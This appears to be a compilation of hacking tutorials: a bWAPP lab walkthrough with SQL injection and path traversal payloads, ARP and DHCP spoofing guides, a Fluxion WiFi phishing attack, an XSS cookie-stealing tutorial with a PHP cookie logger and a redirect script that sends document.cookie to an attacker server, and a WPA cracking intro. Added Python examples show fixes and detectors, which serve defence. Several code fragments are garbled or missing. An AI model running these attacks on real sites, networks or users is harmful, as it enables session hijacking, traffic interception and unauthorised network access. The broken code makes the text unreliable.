How To Practice Hacking With bWAPP ? : Tutorial


Right, in this post I will show you proper ways to practice hacking with bWAPP, and of course with all the hacking techniques.

First of all, what is bWAPP all about?

bWAPP (buggy Web Application)

bWAPP is an insecure open-source web application intended to improve the skills of students, developers or people interested in IT security to discover and prevent web vulnerabilities.

This application has more than 70 vulnerabilities, for example SQL injection, Cross-Site Scripting (XSS) or Denial of Service (DoS).

bWAPP is a PHP application that uses a MySQL database.

It can be hosted on Linux, Windows and Mac with Apache/IIS and MySQL. It can also be installed with WAMP or XAMPP.

Another possibility is to download the bee-box.

bWAPP can be installed in either of two ways:

Option 1 — Windows bWAPP & XAMPP.

Option 2 — VMware bee-box and local Windows.

To learn how to install it in both ways, just click here.

Vulnerabilities that are included in bWAPP are:

  • Blind SQL and Blind OS Command injection
  • Bash Shellshock (CGI) and Heartbleed vulnerability (OpenSSL)
  • Cross-Site Scripting (XSS) and Cross-Site Tracing (XST)
  • Cross-Site Request Forgery (CSRF)
  • AJAX and Web Services vulnerabilities (JSON/XML/SOAP/WSDL)
  • Malicious, unrestricted file uploads and backdoor files
  • Authentication, authorization and session management issues
  • Arbitrary file access and directory traversals
  • Local and remote file inclusions (LFI/RFI)
  • Configuration issues: Man-in-the-Middle, cross-domain policy files, information disclosures,…
  • HTTP parameter pollution and HTTP response splitting
  • Denial-of-Service (DoS) attacks: Slow HTTP and XML Entity Expansion
  • Insecure distcc, FTP, NTP, Samba, SNMP, VNC, WebDAV configurations
  • HTML5 ClickJacking, Cross-Origin Resource Sharing (CORS) and web storage issues
  • Unvalidated redirects and forwards, and cookie poisoning
  • Cookie poisoning and insecure cryptographic storage
  • Server Side Request Forgery (SSRF)
  • XML External Entity attacks (XXE)

Now we’ll practice hacking with bWAPP using a few of these vulnerabilities.


SQL Injection (Search) 

SQL injection is one of the most dangerous vulnerabilities you can find in a website.

In this example it asks us to enter a movie name.

  • Typing “hulk” in the search field gives us one entry: “The Incredible Hulk”

  • So we can be almost certain that the query is something like

    "Select col1,col2,col3 from mytable where movie LIKE '%" . $userinput . "%'"

  • If the form is vulnerable, submitting a single ' should throw a SQL error, because Select col1,col2,col3 from mytable where movie LIKE '%'%' is not a valid query.

  • We can also retrieve user details from the database,
  • but first we need to know how many columns are returned.
  • To find the answer we can use an “order by” clause inside our query: ' order by
  • The query sent to the database will be something like:

    Select col1,col2,col3 from mytable where movie LIKE '%' order by 3 -- -%'

    which means the result will be ordered by the third column… if it exists! Otherwise a SQL error will be thrown. We’ll try with 7 columns.

  • Now we know the query contains at least 7 columns, as no error is thrown.
    We can try with 8 columns.

  • So we got an error! So the query contains 7 columns!

  • We can now perform some clever queries.

  • First, find the current database:

    ' and 1=0 union all select 1,2,database(),4,5,6,7 -- -
    With “and 1=0” because we only want to get data from our union all statement.

  • As you can see, our database is called “bWAPP”.

  • There is a table called “users” in this database.

     Query:

' and 1=0 union all select 1,table_schema,table_name,4,5,6,7 from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema' -- -

  • Table “users” exists. To discover the columns:
    Query:

' and 1=0 union all select 1,table_name, column_name,4,5,6,7 from information_schema.columns where table_schema != 'mysql' and table_schema != 'information_schema' and table_schema='bWAPP' and table_name='users' -- -

Now we have all we need to retrieve all the users’ secrets. One last query:

' and 1=0 union all select 1,login,password,secret,email,admin,7 from users-- -
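Why the inputs above work, and what removes the flaw, shown as an added example that is not bWAPP's own code: the concatenated query next to a parameterized one, run against an in-memory SQLite database. The table layout and all rows are constructed for the demonstration.

```python
import sqlite3

# Input quoted from the text above (written for the 7-column query it describes).
PAGE_UNION_INPUT = "' and 1=0 union all select 1,login,password,secret,email,admin,7 from users-- -"


def make_lab_db():
    """In-memory stand-in for the lab database; every row is constructed sample data."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE movies (id INTEGER, title TEXT, release_year TEXT, genre TEXT,
                             main_character TEXT, imdb TEXT, tickets_stock INTEGER);
        CREATE TABLE users (id INTEGER, login TEXT, password TEXT, secret TEXT,
                            email TEXT, admin INTEGER);
        INSERT INTO movies VALUES (1, 'The Incredible Hulk', '2008', 'action',
                                   'Hulk', 'tt-constructed-1', 100);
        INSERT INTO movies VALUES (2, 'Iron Man', '2008', 'action',
                                   'Tony Stark', 'tt-constructed-2', 53);
        INSERT INTO users VALUES (1, 'alice', 'constructed-hash', 'constructed secret',
                                  'alice@example.test', 1);
        """
    )
    return db


def search_vulnerable(db, term):
    # Same shape as the query guessed in the text: the input is concatenated
    # into the SQL string, so a quote in `term` changes the statement itself.
    sql = "SELECT * FROM movies WHERE title LIKE '%" + term + "%'"
    return db.execute(sql).fetchall()


def search_parameterized(db, term):
    # The SQL text is fixed and `term` is sent separately as a bound value.
    # LIKE wildcards typed by the user are escaped so they match literally.
    escaped = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT * FROM movies WHERE title LIKE ? ESCAPE '\\'"
    return db.execute(sql, ("%" + escaped + "%",)).fetchall()


def outcome(search, db, term):
    """Summarise what a tester would observe for one input."""
    try:
        rows = search(db, term)
    except sqlite3.Error:
        return "sql-error"
    return f"{len(rows)} row(s)"


if __name__ == "__main__":
    db = make_lab_db()
    for term in ["hulk", "'", "' order by 7-- -", "' order by 8-- -", PAGE_UNION_INPUT]:
        print(f"{term!r:85} vulnerable={outcome(search_vulnerable, db, term):10} "
              f"parameterized={outcome(search_parameterized, db, term)}")
```

With the bound parameter every probe from the text is just an odd movie title: there is no error to read, no column count to infer and no second SELECT.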


Cross Site Scripting Reflected(GET)

  • bWAPP is asking us for a last name and a first name

  • So let’s say I’m… Sherlock Holmes!

  • bWAPP welcomes us, and our input is reflected in the page.

  • Look at the URL of our page; it has been changed to

  • Parameters are passed through a GET request (in the URL)

  • We are now going to test whether parameters are filtered to protect bWAPP against bad guys like you.

  • For example, we can try a simple JavaScript injection in the lastname field

  • Our script is executed and the alert box appears.

  • But why? Look at the source code:

  • The lastname field containing our script is reflected in the page, and the JavaScript is interpreted.

  • At this level, the script we injected into the page is not malicious, but we’ll see in later XSS challenges how powerful cross-site scripting can be.
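The reflection described above and its fix, as an added example that is not bWAPP's code: the same welcome page rendered without and with output encoding. The function names and the test input are constructed, and the example goes slightly beyond the text by also covering an attribute value and an inline JavaScript string, which need their own encoding.

```python
import html
import json
from urllib.parse import parse_qs, urlencode

# Constructed test input: closes a double-quoted attribute, then opens a script element.
BREAKOUT = '"><script>alert("test")</script>'


def _params(query_string):
    """Pull firstname/lastname out of a GET query string."""
    parsed = parse_qs(query_string)
    return parsed.get("firstname", [""])[0], parsed.get("lastname", [""])[0]


def welcome_vulnerable(query_string):
    # Behaviour described in the text: GET parameters are written into the
    # response unchanged, so markup inside them becomes part of the page.
    first, last = _params(query_string)
    return (f"<p>Welcome {first} {last}</p>\n"
            f'<input type="text" name="lastname" value="{last}">')


def welcome_encoded(query_string):
    # html.escape(quote=True) encodes & < > " and ', which covers both the
    # element body and a quoted attribute value.
    first, last = (html.escape(v, quote=True) for v in _params(query_string))
    return (f"<p>Welcome {first} {last}</p>\n"
            f'<input type="text" name="lastname" value="{last}">')


def js_string_literal(value):
    # For a value placed inside an inline <script> block: JSON-encode it, then
    # hide the characters the HTML parser reacts to before JavaScript runs.
    literal = json.dumps(value)
    for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
        literal = literal.replace(ch, esc)
    return literal


if __name__ == "__main__":
    qs = urlencode({"firstname": "Sherlock", "lastname": BREAKOUT})
    print(welcome_vulnerable(qs), end="\n\n")
    print(welcome_encoded(qs), end="\n\n")
    print("var lastname =", js_string_literal(BREAKOUT) + ";")
```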

HTML Web Storage(SECRET)

Here we try to steal the user’s login and secret, insecurely stored in HTML5 local storage.

What is local storage?

According to Wikipedia, “Data placed in local storage is per origin and persists after the browser is closed”

Given this fact, we know that:

– Local storage is a browser feature; we can abuse it using JavaScript.

– Local storage follows the same-origin policy, which means data inserted in local storage by can’t be accessed by

I’m sure you already managed the bWAPP XSS challenge, so you know you can access local storage via XSS. You can then refer to the Reflected XSS GET challenge.


Reading local storage is really simple; everything is accessible using a JavaScript object named… localStorage!

We can dump the login and secret asked for by our queen bee with a single line of JavaScript.

for (var key in localStorage){document.write('<br>' + key + ' : ' + localStorage[key])};

Remote & Local File Inclusion

File inclusion happens when a developer needs to include a page (html, txt, php,…) into another page.

In this case, our beloved queen bee uses file inclusion


Once again, notice that the URL changed right after our selection.

We can now see:


So pages lang_en.php, lang_nl.php and lang_fr.php are included depending on your selection.

If you know PHP you have already guessed the PHP code inside the hive must be something like:


Doing this, the file pointed to by the language variable is processed (included) by PHP.

Now what happens if we try to escape the www directory and get the /etc/passwd file?

Current page is

http://your_ip/bWAPP/rlfi.php .

Apache’s root directory is usually /var/www; assume our page is located at


So here’s where we want to go: ../etc/passwd

With each “../” we climb one directory: the first one leads us to /var/www, with the second one we’re in /var, and finally the third places us in the server root directory.

After that we can go to /etc/passwd.

Simply include this path in the URL in place of our included page parameter (lang_en.php) and see what happens:


You can see the password file! We have our first file inclusion vulnerability.

With this flaw you can read any file readable by the webserver process, including .htaccess files.
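How the traversal resolves and two ways to stop it, as an added example that is not bWAPP's code: an allowlist for the language parameter and a canonical-path containment check. `/var/www/bWAPP` is the assumed install directory from the walk-through above; the function names are made up for the demonstration.

```python
import os

BASE_DIR = "/var/www/bWAPP"  # assumed install directory, as in the text
ALLOWED_LANGUAGES = {"lang_en.php", "lang_fr.php", "lang_nl.php"}  # file names from the text


def resolve_unchecked(language):
    # What an unchecked include amounts to: the parameter is joined to the
    # directory and whatever path results is the file that gets processed.
    return os.path.realpath(os.path.join(BASE_DIR, language))


def resolve_allowlisted(language):
    # Fix 1: the parameter only selects among known files; it is never a path.
    if language not in ALLOWED_LANGUAGES:
        raise ValueError(f"language file not allowed: {language!r}")
    return os.path.join(BASE_DIR, language)


def resolve_contained(relative_path, base_dir=BASE_DIR):
    # Fix 2, for cases where a fixed list is impractical: canonicalise first
    # (collapsing "../" and symlinks), then require the result to stay in base_dir.
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, relative_path))
    if os.path.commonpath([base, target]) != base:
        raise ValueError(f"path escapes {base}: {relative_path!r}")
    return target


def is_rejected(resolver, value):
    """True when the resolver refuses the value."""
    try:
        resolver(value)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for value in ["lang_en.php", "../../../etc/passwd", "/etc/passwd",
                  "lang_en.php/../../../../etc/passwd"]:
        print(f"{value!r:40} unchecked -> {resolve_unchecked(value):28} "
              f"allowlist rejects: {is_rejected(resolve_allowlisted, value)!s:5} "
              f"containment rejects: {is_rejected(resolve_contained, value)}")
```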


I hope this article gave you the required knowledge on bWAPP.

I hope this article is helpful to you. Check out the exclusive article on How To Track An Email?!

Happy Hacking.

How To Do DHCP Spoofing Using Ettercap ? [MITM Series : 3]


Hello, welcome all hackers and geeks. In this tutorial we’ll learn DHCP spoofing using Ettercap and all about the DHCP server.

In the previous article we learned DNS spoofing using dnsspoof and ettercap; please do read that.

What is DHCP?

DHCP stands for Dynamic Host Configuration Protocol. It usually runs as a server or service on a network and is basically used to assign IP addresses to all the hosts.
The working of DHCP is simple: the client queries the DHCP server to be assigned an IP address and DNS, and the DHCP server provides the IP address and the DNS server IP along with a lease time.
The lease time is the period for which the IP address given by DHCP is valid.

DHCP Spoofing

DHCP spoofing has 2 attacks:
1. DHCP starvation attack
A DHCP starvation attack is similar to a DoS attack: the attacker floods the network with fake MAC addresses and fake users until the DHCP database becomes full and can no longer hand out IP addresses, so that legitimate users don’t get a connection.
2. DHCP rogue server attack
This is the attack explained here. In a DHCP rogue server attack the attacker creates a fake DHCP server, intercepts the DHCP requests and provides fake IP addresses by poisoning DHCP responses.

DHCP attack scenario

As I’ve explained above, we’ll get into a network and, by providing an IP pool and a DNS server with netmask, set up a fake DHCP server on our Kali Linux machine and give fake responses to the connected clients, so that we can see what they’re doing and sniff the HTTP data connections using Wireshark.

Getting started with Ettercap

We’ll use Ettercap for this attack. If you don’t have ettercap on Linux, install it by running this command on Debian-based Linux distributions

sudo apt-get install ettercap

After the installation finishes, run this command to get the GUI version of ettercap

ettercap -G

Then go to the main tab and select start sniffing, then go to the MITM tab and select DHCP spoofing from the drop-down list.

A small popup menu will appear; there you have to give the pool of IP addresses which you want to attack. You must choose the IP addresses based on the gateway IP address, which you can get by running the ifconfig command in a terminal.

Then provide the IP address pool as follows. If your gateway is then give

This will attack the whole subnet of the gateway. Then specify the gateway as you found above.
Then specify the DNS as the standard DNS server.
Then start the attack. You can see the attack progress in the bottom bar, as here.


Whenever a client requests an IP address, our rogue DHCP server gives fake responses, and DHCP assigns our desired IP address.
Now you are free to open Wireshark and play with the clients’ packet transmissions.
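Seen from the network owner's side, a rogue server stands out because its replies do not match the one server that is supposed to answer. The following added example (not part of the original article) checks DHCP OFFER/ACK records against a site policy; the policy values and the capture records are constructed, and a flat LAN without DHCP relay agents is assumed.

```python
# Site policy: assumed values for the example network.
AUTHORIZED = {
    "server_id": "192.168.1.1",          # DHCP option 54 (server identifier)
    "server_mac": "aa:aa:aa:aa:aa:01",   # Ethernet source of genuine replies
    "router": "192.168.1.1",             # DHCP option 3
    "dns": {"192.168.1.1"},              # DHCP option 6
}

# Constructed records, one per DHCP message seen on the wire.
SAMPLE_MESSAGES = [
    {"type": "DISCOVER", "src_mac": "aa:aa:aa:aa:aa:50"},
    {"type": "OFFER", "src_mac": "aa:aa:aa:aa:aa:01", "server_id": "192.168.1.1",
     "yiaddr": "192.168.1.50", "router": "192.168.1.1", "dns": ["192.168.1.1"]},
    {"type": "OFFER", "src_mac": "aa:aa:aa:aa:aa:66", "server_id": "192.168.1.66",
     "yiaddr": "192.168.1.120", "router": "192.168.1.66", "dns": ["192.168.1.1"]},
    {"type": "ACK", "src_mac": "aa:aa:aa:aa:aa:66", "server_id": "192.168.1.1",
     "yiaddr": "192.168.1.120", "router": "192.168.1.1", "dns": ["192.168.1.66"]},
]


def check_dhcp_reply(msg, policy):
    """Return the reasons a server reply disagrees with the site policy."""
    reasons = []
    if msg["server_id"] != policy["server_id"]:
        reasons.append("unknown server identifier (option 54)")
    if msg["src_mac"].lower() != policy["server_mac"]:
        reasons.append("reply sent from an unexpected MAC address")
    if msg["router"] != policy["router"]:
        reasons.append("router (option 3) differs from policy")
    if not set(msg["dns"]) <= policy["dns"]:
        reasons.append("DNS server (option 6) outside policy")
    return reasons


def find_rogue_dhcp(messages, policy):
    """List (index, source MAC, reasons) for every suspicious OFFER/ACK."""
    findings = []
    for index, msg in enumerate(messages):
        if msg["type"] not in ("OFFER", "ACK"):
            continue  # client messages carry no server claims to verify
        reasons = check_dhcp_reply(msg, policy)
        if reasons:
            findings.append((index, msg["src_mac"], reasons))
    return findings


def responders(messages):
    """MAC addresses that answered as a DHCP server; more than one deserves a look."""
    return {m["src_mac"].lower() for m in messages if m["type"] in ("OFFER", "ACK")}


if __name__ == "__main__":
    for index, mac, reasons in find_rogue_dhcp(SAMPLE_MESSAGES, AUTHORIZED):
        print(f"message {index} from {mac}: " + "; ".join(reasons))
    print("servers answering:", sorted(responders(SAMPLE_MESSAGES)))
```

On managed switches the preventive counterpart is DHCP snooping, which drops server replies arriving on ports that are not marked as trusted.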

I hope this article was helpful. We’ll discuss ICMP redirection and router admin control DoS attacks in a future part of this article.

U.S. Marshals Says Prisoners’ Personal Information Taken In Data Breach

A data breach at the U.S. Marshals Service exposed the personal information
of current and former prisoners, TechCrunch has learned.

How To Sniff Data Using ARPspoof & Ettercap ? [MITM Series : 1]


Hello world. In this article we’ll learn about ARP spoofing using arpspoof and Ettercap: arpspoof from the command line, and also the graphical Ettercap.

What is ARP ?

ARP stands for Address Resolution Protocol, which queries the hosts on a network for their MAC address, the physical address of the systems connected on that LAN.
Basically, the ARP protocol broadcasts the IP address of a connected host and queries for its MAC address. When a host returns the MAC address, ARP stores the MAC address with the IP address of that host.

Attack Scenario:

What we are doing is poisoning the ARP requests with fake responses. As ARP goes on broadcasting, we’ll spoof our IP address even though we don’t have the legitimate MAC address, so we get illegitimate access to other computers’ connections. We can get the DNS requests, HTTP and all the network traffic from other users, that is, our victim.

We are using arpspoof, a command-line tool; you can get it with this command.

sudo apt-get install arpspoof

After installing, you can use this tool. There are two methods:
one-way poisoning and two-way poisoning.
In one-way poisoning we spoof the requests made by the victim host to the router.
Two-way poisoning deals with both directions, victim to router and router to victim.
We’ll discuss both attacks.

To capture the network traffic you need a network packet analyzer. There are many applications;
you can use any. I prefer Wireshark.
You can go through this tutorial about getting Wireshark on your Linux or Windows machine.

Getting Started:

First you should forward all the connections going through the network, so open 2 terminals for performing two-way poisoning.
First you have to run this command to forward connections.

echo 1 > /proc/sys/net/ipv4/ip_forward

After this command you should start poisoning by running these commands, one on each terminal.
At Terminal 1

arpspoof -t <victim_ip> <gateway_ip>

This will poison all the queries going from the victim to the router host.
At Terminal 2

arpspoof -t <gateway_ip> <victim_ip>

This will poison all the queries going from the router host to the victim.
You are now free to open Wireshark, capture packets and filter them for HTTP.
We have articles on Wireshark that you can refer to in order to learn Wireshark and how to make use of it.


Ettercap has a graphical user interface; with it we can run many LAN and MITM attacks easily. You can install it on Linux just by

sudo apt-get install ettercap

Run it from terminal using

ettercap -G

In the top bar you can find the MITM tab, where there is an ARP spoof option.

First you need to start unified sniffing, then go to hosts and scan for hosts.

Add the victim’s IP address to Target 1 and the gateway IP address to Target 2.
Then go to the MITM tab and select ARP spoofing; you can use two-way poisoning just by checking the check-box.

Then start capturing packets on the network using Wireshark.
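Two-way poisoning leaves a recognisable trace: the gateway's and the victim's IP addresses both start resolving to one new MAC address. This added example (not from the original article) looks for that pattern in ARP replies; the capture lines are constructed, in tcpdump-like text, and the addresses are made up.

```python
import re
from collections import defaultdict

ARP_REPLY = re.compile(
    r"ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at (?P<mac>[0-9a-f]{2}(?::[0-9a-f]{2}){5})",
    re.IGNORECASE,
)

# Constructed capture: gateway .1, a client .50, and a host .66 that starts
# answering for both of them.
SAMPLE_LINES = [
    "10:00:01.000 ARP, Reply 192.168.1.1 is-at aa:aa:aa:aa:aa:01, length 28",
    "10:00:02.000 ARP, Reply 192.168.1.50 is-at aa:aa:aa:aa:aa:50, length 28",
    "10:00:03.000 ARP, Reply 192.168.1.66 is-at aa:aa:aa:aa:aa:66, length 28",
    "10:00:09.000 ARP, Request who-has 192.168.1.1 tell 192.168.1.50, length 28",
    "10:00:10.000 ARP, Reply 192.168.1.1 is-at aa:aa:aa:aa:aa:66, length 28",
    "10:00:10.500 ARP, Reply 192.168.1.50 is-at aa:aa:aa:aa:aa:66, length 28",
    "10:00:12.000 ARP, Reply 192.168.1.1 is-at aa:aa:aa:aa:aa:66, length 28",
]


def find_arp_anomalies(lines, known_bindings=None):
    """Report IPs whose MAC changed and MACs that answer for several IPs.

    known_bindings maps IP -> MAC for hosts pinned in advance (the gateway,
    for instance); any other IP is trusted on first sight.
    """
    bindings = dict(known_bindings or {})
    ips_by_mac = defaultdict(set)
    changed = []
    for line in lines:
        match = ARP_REPLY.search(line)
        if match is None:
            continue  # requests and unrelated traffic
        ip, mac = match.group("ip"), match.group("mac").lower()
        ips_by_mac[mac].add(ip)
        trusted = bindings.setdefault(ip, mac)
        if trusted != mac and (ip, trusted, mac) not in changed:
            changed.append((ip, trusted, mac))
    # One MAC claiming many IPs also occurs with proxy ARP or multi-homed
    # hosts, so treat it as a lead to confirm rather than as proof.
    shared = {mac: sorted(ips) for mac, ips in ips_by_mac.items() if len(ips) > 1}
    return {"binding_changed": changed, "mac_with_many_ips": shared}


if __name__ == "__main__":
    report = find_arp_anomalies(SAMPLE_LINES)
    for ip, old, new in report["binding_changed"]:
        print(f"{ip} moved from {old} to {new}")
    for mac, ips in report["mac_with_many_ips"].items():
        print(f"{mac} answers for {', '.join(ips)}")
```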

I hope this article was helpful in understanding ARP spoofing with two methods. We’ll continue this MITM series in the next article, where we’ll discuss the DNS spoofing attack.

How To Hack WiFi Using Fluxion In Kali Linux

Hacking WiFi Social engineering method with Fluxion


Today we will try the social engineering method of hacking WiFi with a Fluxion attack. This method works well, is easy to implement, and is the one that works most often.


We Require following..
1. Fluxion
2. Aircrack-ng
3. mdk3 (optional)

This hack works on Linux.
First, download and install fluxion from here

Install this tool from GitHub.
Simply clone the link which is there on GitHub and come to the terminal:
git clone

After successful installation, run this tool
by executing its script


Make sure that the fluxion folder has sufficient access rights and the ./fluxion file has executable permission.
If that is not the case, just type this in the terminal:
chmod 755 ./fluxion


On startup, fluxion asks you to specify which WLAN interface you use to hack WiFi.
If you have an external WiFi card and you’d like to use that, just get the interface and specify it.
If you use the internal WLAN card, that is wlan0; press 1 to continue.

Fluxion initializes all the network cards and automatically turns your NIC to monitor mode.
It will show the list of available targets; select the target by pressing the ID number of that connection.

After selection of a target, fluxion shows many options and types of hacking.

We will select option 1 for creating a fake AP (access point) and press ENTER.
Then we will select the dependency tool for cracking the WiFi password:
press ENTER to skip and then select 1 for choosing aircrack-ng from the handshake checking options.

To get the password you should perform a de-authentication attack on the target WiFi, so you can select all users by typing 1, or you can select a particular user’s MAC address and de-authenticate him.
After selecting 1 it will open 2 windows, one for capturing the WPA handshake and the other for de-authenticating all clients. Now enter 1 in the MENU window to check the handshake without closing the other windows.

After checking the handshake it will ask you to choose the web interface, so select 1 and press ENTER.
If you know the router model, you can also pick that type of web interface to make this work.
Now it will ask you to choose the language, so select 1 for ENGLISH and press ENTER.
Now it will open 4 windows, starting the fake AP and de-authenticating the clients of the WiFi network.
It also starts DNS spoofing on the target WiFi so that all of his DNS queries are poisoned until he enters a password and that password matches our captured password nonce.

So you can get persistent WiFi access and the real password of the WiFi. The password file will be in the present location of the terminal.

I hope this will help you to understand the social engineering attack on WiFi, and that you can hack WiFi easily.

How To Steal Cookies With XSS ?! : Tutorial


In this tutorial, we will exploit the Cross Site Scripting (XSS) vulnerability for Cookie Stealing! I guess you already know a bit of the theory behind XSS, so we’ll get right to the code.

Read our previous tutorial on XSS Hack, to get a rough idea of it.

Let’s say a web page has a search function that uses this code:



<tr><td>Name</td><td><input type="text" name="advisor_name" value="<script>alert("test")</script>"></td></tr>

Note the quotes around our script. So what do we do? We need to end the value field before our script can actually be executed. So we tweak our test injection a bit:




This should close the quotes and end the input section so that our script can be rendered as a part of the source instead of plain text. And now when we hit enter we get a nice pop-up box saying “test”, showing us our script was executed.

Keep in mind that you’re not actually writing this data to the server (unless you’re injecting it with a script that actually modifies the page on the server’s end also, like a guestbook or comment script), just changing how the dynamic page is acting on your end. If you want someone else to see what you see when you use this injection, you need to send them the link with that injection already in the page.

For example.



Of course, if you don’t want the recipient to see the injection, you’ll need to hex the query. You can do that here.

Hexing the query of this url gives us


Quote: f%73%63%72%69%70%74%3e

The above is a very simple case of finding an XSS injection vulnerability. Some html and javascript knowledge is definitely helpful for finding more complicated ones, but code like the above works often enough.

Using XSS For Cookie Stealing

Cookie Stealing With XSS

OK, so now you know the page is vulnerable to XSS injection. Great. Now what? You want to make it do something useful, like steal cookies. Cookie stealing is when you insert a script into the page so that everyone that views the modified page inadvertently sends you their ******* cookie. By modifying your ******* cookie, you can impersonate any user who viewed the modified page. So how do you use XSS to steal cookies?

The easiest way is to use a three-step process consisting of the injected script, the cookie recorder, and the log file.

First you’ll need to get an account on a server and create two files, log.txt and whateveryouwant.php. You can leave log.txt empty. This is the file your cookie stealer will write to. Now paste this php code into your cookie stealer script (whateveryouwant.php):




function GetIP()
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = "unknown";

function logData()
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();

$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");

if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");



This script will record the cookies of every user that views it.

Next Step!

Now we need to get the vulnerable page to access this script. We can do that by modifying our earlier injection:



"><script language= "JavaScript">document.location="" + document.cookie;document.location=""</script> is the server you’re hosting your cookie stealer and log file on, and is the vulnerable page you’re exploiting. The above code redirects the viewer to your script, which records their cookie to your log file. It then redirects the viewer back to the unmodified search page so they don’t know anything happened. Note that this injection will only work properly if you aren’t actually modifying the page source on the server’s end. Otherwise the unmodified page will actually be the modified page and you’ll end up in an endless loop. While this is a working solution, we could eliminate this potential issue when using source-modifying injections by having the user click a link that redirects them to our stealer:




to this:



echo '<b>Page Under Construction</b>'

Now when you open log.txt, you should see something like this:



IP: | PORT: 56840 | HOST: | Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/2009032711 Ubuntu/8.10 (intrepid) Firefox/3.0.8 | METHOD: | REF: |
DATE: Tuesday 21st 2017f April 2017 05:04:07 PM | COOKIE: cookie=PHPSESSID=889c6594db2541db1666cefca7537373

You will most likely see many other fields besides PHPSESSID, but this one is good enough for this example. Now remember how to edit cookies like I showed you earlier? Open up firebug and add/modify all your cookie’s fields to match the data from the cookie in your log file and refresh the page. The server thinks you’re the user you stole the cookie from. This way you can log into accounts and many other things without even needing to know the passwords or usernames.

Winding Up Altogether!

1. Test the page to make sure it’s vulnerable to XSS injections.

2. Once you know it’s vulnerable, upload the cookie stealer php file and log file to your server.

3. Insert the injection into the page via the url or text box.

4. Grab the link of that page with your exploited search query (if injection is not stored on the server’s copy of the page).

5. Get someone to use that link if necessary.

6. Check your log file for their cookie.

7. Modify your own cookie to match the captured one and refresh the page
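The whole chain above depends on page script being able to read the session cookie through document.cookie. As an added example (not part of the original tutorial), this audit reads Set-Cookie header values and reports the attributes whose absence makes that possible, next to a hardened header built with Python's standard library; the header values and the session id are constructed.

```python
from http.cookies import SimpleCookie

# Constructed Set-Cookie values, as a scanner or proxy log would show them.
SAMPLE_HEADERS = [
    "PHPSESSID=constructed-session-id; path=/",
    "PHPSESSID=constructed-session-id; path=/; HttpOnly",
    "theme=dark; Path=/; Secure; HttpOnly; SameSite=Strict",
]


def audit_set_cookie(header_value):
    """Return (cookie_name, findings) for one Set-Cookie header value."""
    first, *rest = [part.strip() for part in header_value.split(";")]
    name = first.partition("=")[0]
    attrs = {}
    for part in rest:
        key, _, value = part.partition("=")
        attrs[key.strip().lower()] = value.strip()
    findings = []
    if "httponly" not in attrs:
        findings.append("no HttpOnly: injected script can read it via document.cookie")
    if "secure" not in attrs:
        findings.append("no Secure: sent over plain HTTP where it can be sniffed")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("no SameSite=Lax/Strict: attached to cross-site requests")
    return name, findings


def audit_headers(header_values):
    """Map cookie name -> findings for every header that has at least one."""
    report = {}
    for value in header_values:
        name, findings = audit_set_cookie(value)
        if findings:
            report.setdefault(name, []).extend(f for f in findings
                                               if f not in report.get(name, []))
    return report


def hardened_session_cookie(session_id):
    """Build a session cookie header value with all three protections set."""
    jar = SimpleCookie()
    jar["PHPSESSID"] = session_id
    morsel = jar["PHPSESSID"]
    morsel["path"] = "/"
    morsel["httponly"] = True
    morsel["secure"] = True
    morsel["samesite"] = "Lax"
    return morsel.OutputString()


if __name__ == "__main__":
    for header in SAMPLE_HEADERS + [hardened_session_cookie("constructed-session-id")]:
        name, findings = audit_set_cookie(header)
        print(f"{header}\n  -> {name}: {findings or 'ok'}")
```

In PHP the matching settings are session.cookie_httponly, session.cookie_secure and session.cookie_samesite. HttpOnly stops the cookie from being read by script but does not stop the injection itself, so output encoding is still required.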

How To Hack WPA2 WEP Protected Wifi Using Aircrack-ng

This post deals with hacking WPA/WPA2/WEP protected WiFi security using Aircrack-ng.
WEP has been deprecated since early 2001; WPA was introduced as an industry standard, which used TKIP for encryption of data. Later, WPA2 became an industry standard since it introduced AES encryption, which is more powerful than TKIP; however, it also supports TKIP encryption. The WPA/WPA2 key that we would use to authenticate on a wireless network is used to generate another unique key. Five additional parameters would be added to our key to generate a unique key. The parameters are the SSID of the network, authenticator Nonce (ANonce), supplicant Nonce (SNonce), authenticator MAC address (access point MAC), and supplicant MAC address (WiFi client MAC). From a hacker’s perspective, we can use a brute force or dictionary attack or rainbow tables to crack a WPA/WPA2 network; obviously a dictionary attack is much less time consuming than other attacks, therefore it should be your first preference. The success rate of this attack depends upon the wordlist you would use. Another requirement for this attack to work is the four-way handshake, which takes place between a client and an access point, which we will capture using the deauthentication attack.
Let’s see how we can use Aircrack-ng to crack a WPA/WPA2 network:


Step 1—First of all, ensure that your network card is in monitor mode.
